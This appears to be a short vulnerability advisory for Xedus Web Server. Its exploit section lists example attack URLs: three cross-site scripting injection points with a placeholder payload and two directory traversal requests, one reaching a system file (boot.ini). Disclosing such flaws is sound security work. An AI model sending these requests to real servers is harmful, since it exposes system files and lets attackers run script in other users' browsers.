• info
• discussion
• exploit
• solution
• references

Xedus Web Server Multiple Vulnerabilities

An exploit is not required, however examples were provided:

For the cross-site scripting vulnerabilities:
http://www.example.com:4274/test.x?username=[XSS]
http://www.example.com:4274/TestServer.x?username=[XSS]
http://www.example.com:4274/testgetrequest.x?param=[XSS]

For the directory traversal vulnerability:
http://www.example.com:4274/../data/log.txt
http://www.example.com:4274/../../../../../boot.ini